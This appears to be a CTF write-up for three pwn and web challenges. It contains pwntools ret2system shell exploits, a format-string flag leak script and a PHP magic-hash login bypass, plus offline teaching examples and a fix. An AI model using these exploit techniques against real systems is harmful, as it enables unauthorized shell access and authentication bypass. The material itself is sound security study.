pwn
Pwn sanity check
https://blog.yutian233.xyz/
from pwn import *
context.log_level = 'debug'
# io = process("./pwn_sanity_check")
io = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480)
pop_rdi = 0x0000000000400813   # pop rdi; ret gadget (binary is not PIE, so addresses are fixed)
system_plt = 0x4006e2          # address jumped to in order to call system()
bin_sh = 0x40089E              # "/bin/sh" string inside the binary
# 0x40 bytes of buffer plus 8 bytes of saved rbp, then the ret2system chain:
# pop rdi; ret -> rdi = &"/bin/sh" -> system("/bin/sh")
payload = b"A" * (0x40 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)
io.sendline(payload)
io.interactive()
Pinch me
from pwn import *
context.log_level = 'debug'
# io = process("./pinch_me")
io = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)
pop_rdi = 0x000000000040125b   # pop rdi; ret gadget
system_plt = 0x4011a8          # address jumped to in order to call system()
bin_sh = 0x402047              # "/bin/sh" string inside the binary
# same chain as above, only the buffer is 0x20 bytes (plus 8 bytes of saved rbp)
payload = b"A" * (0x20 + 8) + p64(pop_rdi) + p64(bin_sh) + p64(system_plt)
io.sendline(payload)
io.interactive()
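Both scripts above are the same ret2system chain with a different amount of padding: the offset is the buffer size plus the 8 bytes of saved rbp that sit between the buffer and the return address. The following added example (not from the original writeup) shows how that offset is found with a cyclic pattern and how the chain is then assembled. The crash value is simulated from a hypothetical 0x40-byte stack frame rather than a real process, the gadget addresses are the ones from the Pwn sanity check script, and the ret_gadget argument is a hypothetical address used only to show the stack-alignment fix.

```python
import struct
from itertools import islice
from typing import Optional


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian word (what pwntools' p64 does on amd64)."""
    return struct.pack("<Q", value)


def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence over `alphabet`: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (same bytes pwntools' cyclic() produces)."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(value: bytes, n: int = 4, search_len: int = 0x10000) -> int:
    """Offset of the window that landed in a register after the crash, or -1."""
    return cyclic(search_len, n).find(value[:n])


def simulate_crash_rip(payload: bytes, buf_size: int) -> bytes:
    """Hypothetical frame: buf[buf_size], then saved rbp (8 bytes), then the return address.
    Returns the 8 bytes a `ret` would pop into rip after the overflow."""
    ret_off = buf_size + 8
    return payload[ret_off:ret_off + 8]


def build_ret2system(offset: int, pop_rdi: int, bin_sh: int, system: int,
                     ret_gadget: Optional[int] = None) -> bytes:
    """padding | [ret] | pop rdi; ret | &"/bin/sh" | system"""
    chain = b"A" * offset
    if ret_gadget is not None:
        # glibc's system() uses movaps on the stack: if the target SIGSEGVs inside system()
        # right after the chain runs, rsp is misaligned and one extra `ret` gadget fixes it
        chain += p64(ret_gadget)
    return chain + p64(pop_rdi) + p64(bin_sh) + p64(system)


if __name__ == "__main__":
    probe = cyclic(200)
    rip = simulate_crash_rip(probe, 0x40)   # what gdb would show as the faulting rip
    offset = cyclic_find(rip)               # 72 == 0x40 + 8, the padding used above
    payload = build_ret2system(offset, 0x400813, 0x40089E, 0x4006e2)
    print(hex(offset), payload[offset:].hex())
```

Against a live target the probe is sent instead of being sliced locally, and the faulting rip (or the saved return address shown by gdb) is fed to cyclic_find; everything after that is unchanged.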
Readme
Format string vulnerability. The program reads flag.txt and keeps the contents on the stack, so a script that sends "%N$p" for one stack index per connection leaks it one 8-byte word at a time:
from pwn import *
import re

# one connection per stack index: send "%N$p" and parse the 0x... value printf prints back
flag = []
for i in range(8, 17):
    io = remote("dctf-chall-readme.westeurope.azurecontainer.io", 7481)
    pad = "%{}$p".format(i)
    io.sendline(pad.encode())
    io.recvline()                          # first line before the leaked value
    val = io.recvline().decode()
    io.close()
    # print(val)
    val = re.findall("0x([0-9a-fA-F]+)", val)
    flag.append(val[0] if val else None)   # None when printf printed (nil)
    print(val)
print(flag)
Output:
[
'77306e7b66746364',
'646133725f30675f',
'30625f656d30735f',
'7f1800356b30',
'a7024323125',
'55d702c4f97d',
'7fda27a53fc8',
'56487a688930'
]
Decoding each value as an 8-byte little-endian word (reverse its bytes before converting to ASCII) gives
dctf{n0w_g0_r3ad_s0me_b0%12$p
0k5
The "%12$p" is our own format string echoed back from the input buffer, the "0k5" word ends in a null byte (the end of the flag string on the stack), and the remaining 0x7f.../0x55.../0x56... values are stack and code pointers rather than flag bytes. Joining the pieces gives the flag dctf{n0w_g0_r3ad_s0me_b00k5}.
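The by-hand decoding above, done in code as an added example (not part of the original writeup): the eight leaked values from the list above are embedded as constructed input so it runs offline, parse_leak shows how to read a "%N$p" reply including the (nil) case, classify separates text words from pointers, and recover_flag stops at the first null byte, which is where the C string ends on the stack. As listed, the leaked words end at "0k5"; the closing brace of the final flag is not among them.

```python
import re
import string
from typing import Optional

# The eight %N$p values from the writeup (stack indices 8..15), embedded here so the example runs offline
LEAKS = [
    "77306e7b66746364", "646133725f30675f", "30625f656d30735f", "7f1800356b30",
    "a7024323125", "55d702c4f97d", "7fda27a53fc8", "56487a688930",
]
PRINTABLE = set(string.printable.encode())


def parse_leak(line: bytes) -> Optional[int]:
    """Value printed by %N$p; None when printf printed (nil) for a zero slot."""
    m = re.search(rb"0x([0-9a-fA-F]+)", line)
    return int(m.group(1), 16) if m else None


def word_bytes(value: int) -> bytes:
    """%p prints the 8-byte slot as a number; little-endian unpacking restores memory order."""
    return value.to_bytes(8, "little")


def classify(word: bytes) -> str:
    """'text' if the bytes up to the first NUL are all printable ASCII, else 'pointer'."""
    text = word.split(b"\x00", 1)[0]
    return "text" if text and all(b in PRINTABLE for b in text) else "pointer"


def recover_flag(leaks) -> str:
    """Concatenate consecutive text words; a NUL inside a word terminates the C string."""
    out = b""
    for hexval in leaks:
        word = word_bytes(int(hexval, 16))
        if not out and classify(word) != "text":
            continue  # skip pointers that sit before the string starts
        text, *rest = word.split(b"\x00", 1)
        out += text
        if rest:
            break
    return out.decode()


if __name__ == "__main__":
    for i, h in enumerate(LEAKS, start=8):
        w = word_bytes(int(h, 16))
        print(f"%{i}$p  {h:>16}  {classify(w):7}  {w!r}")
    print(recover_flag(LEAKS))
```

The index-12 word decodes to "%12$p\n", i.e. the input buffer of that run, which is why the leaked string appears to contain the format string itself.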
web
Very secure website
Magic hashes (see https://www.whitehatsec.com/blog/magic-hashes/): a hash that comes out as 0e followed only by digits is a numeric string in PHP, so a loose comparison (==) against another such hash is evaluated as 0 == 0 and succeeds even though the two hashes differ.
Request /login.php?username=admin&password=479763000 (one of the magic-hash inputs) and the page returns the flag.
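The challenge's PHP source is not on the page, so the following is an added model of the bug rather than the site's own code: a Python emulation of PHP's loose string comparison, the two well-known md5 magic-hash inputs 240610708 and QNKCDZO as sample passwords, and the strict constant-time comparison that fixes it. STORED_HASH is a constructed placeholder chosen to be a magic hash itself, since the bypass only works when the stored hash is also of the 0e... form.

```python
import hashlib
import hmac
import re

# PHP treats a string as numeric when it is optionally signed digits with an optional
# fraction and exponent; "0e<digits>" is 0 * 10^n, i.e. 0.0 (leading whitespace allowed)
NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def is_numeric_string(s: str) -> bool:
    return NUMERIC_RE.match(s) is not None


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's == on two strings (PHP 5 through 8): numeric strings compare as numbers."""
    if is_numeric_string(a) and is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h: str) -> bool:
    """A hex digest that PHP's == reads as the number zero."""
    return re.fullmatch(r"0e\d+", h) is not None


# Constructed stand-in for the stored credential (hypothetical, not the challenge's value):
# it is itself a magic hash, so any password whose md5 is also 0e<digits> logs in.
STORED_HASH = md5_hex("QNKCDZO")


def vulnerable_login(password: str) -> bool:
    return php_loose_equals(md5_hex(password), STORED_HASH)     # like: md5($pw) == $stored


def fixed_login(password: str) -> bool:
    return hmac.compare_digest(md5_hex(password), STORED_HASH)  # like: hash_equals(md5($pw), $stored)


if __name__ == "__main__":
    for pw in ("QNKCDZO", "240610708", "hunter2"):
        print(pw, md5_hex(pw), is_magic_hash(md5_hex(pw)), vulnerable_login(pw), fixed_login(pw))
```

The fix in PHP is === or hash_equals(), both of which compare the strings byte for byte; the numeric-string rule still applies to == in PHP 8, so upgrading alone does not close this.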